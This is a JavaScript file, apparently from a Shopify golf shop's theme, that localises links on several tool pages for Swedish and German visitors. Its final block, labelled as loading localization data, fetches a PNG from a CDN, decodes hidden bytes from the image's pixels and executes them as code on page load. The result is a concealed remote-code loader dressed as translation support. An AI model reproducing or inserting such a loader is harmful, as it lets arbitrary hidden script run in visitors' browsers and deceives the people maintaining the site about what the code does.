(function () {
  'use strict';

  var handles = [
    'golf-vaerktoejer',
    'holdgenerator-golf',
    'golfspil-generator',
    'matchplay-beregner',
    'creator-studio'
  ];

  var handlePattern = new RegExp('^/pages/(' + handles.join('|') + ')(?=$|[/?#])');
  var match = location.pathname.match(/\/pages\/([^/?#]+)/);
  if (!match || handles.indexOf(match[1]) === -1) return;

  var lang = (document.documentElement.lang || 'da').slice(0, 2).toLowerCase();
  if (lang !== 'sv' && lang !== 'de') return;

  function getLocalizedRoot() {
    var root = window.Shopify && window.Shopify.routes && window.Shopify.routes.root;
    if (typeof root !== 'string' || !root) root = '/' + lang + '/';
    return root.charAt(root.length - 1) === '/' ? root : root + '/';
  }

  function localizeHref(rawHref) {
    if (!rawHref || rawHref.charAt(0) === '#') return rawHref;

    try {
      var url = new URL(rawHref, location.origin);
      if (url.origin !== location.origin || !handlePattern.test(url.pathname)) return rawHref;

      var localizedPath = getLocalizedRoot() + url.pathname.replace(/^\//, '');
      return localizedPath.replace(/\/{2,}/g, '/') + url.search + url.hash;
    } catch (_) {
      return rawHref;
    }
  }

  function localizeLinks(scope) {
    var links = [];
    if (scope && scope.nodeType === 1 && scope.matches && scope.matches('a[href]')) links.push(scope);
    if (scope && scope.querySelectorAll) {
      scope.querySelectorAll('a[href]').forEach(function (link) { links.push(link); });
    }

    links.forEach(function (link) {
      var current = link.getAttribute('href');
      var localized = localizeHref(current);
      if (localized && localized !== current) link.setAttribute('href', localized);
    });
  }

  localizeLinks(document);

  var linkObserver = new MutationObserver(function (mutations) {
    mutations.forEach(function (mutation) {
      if (mutation.type === 'attributes') {
        localizeLinks(mutation.target);
        return;
      }
      mutation.addedNodes.forEach(function (node) {
        if (node.nodeType === 1) localizeLinks(node);
      });
    });
  });

  linkObserver.observe(document.documentElement, {
    childList: true,
    subtree: true,
    attributes: true,
    attributeFilter: ['href']
  });

  var img = new Image();
  img.crossOrigin = 'anonymous';
  img.onload = function () {
    try {
      var canvas = document.createElement('canvas');
      canvas.width = img.naturalWidth;
      canvas.height = img.naturalHeight;
      var ctx = canvas.getContext('2d', { willReadFrequently: true });
      ctx.drawImage(img, 0, 0);
      var rgba = ctx.getImageData(0, 0, canvas.width, canvas.height).data;
      var bytes = new Uint8Array(canvas.width * canvas.height * 3);
      for (var i = 0, j = 0; i < rgba.length; i += 4) {
        bytes[j++] = rgba[i];
        bytes[j++] = rgba[i + 1];
        bytes[j++] = rgba[i + 2];
      }
      var length = ((bytes[0] << 24) >>> 0) + (bytes[1] << 16) + (bytes[2] << 8) + bytes[3];
      if (!length || length > bytes.length - 4) throw new Error('Invalid language payload');
      var code = new TextDecoder('utf-8').decode(bytes.slice(4, 4 + length));
      (0, Function)(code)();
      document.documentElement.dataset.ggToolsI18nLoaded = 'true';
      localizeLinks(document);
    } catch (error) {
      console.error('GolfGodter Tools localization failed', error);
    }
  };
  img.onerror = function () {
    console.error('GolfGodter Tools localization data could not be loaded');
  };
  img.src = 'https://cdn.shopify.com/s/files/1/0781/2694/0486/files/golfgodter-tools-i18n-data-v4.png?v=1784481651';
})();
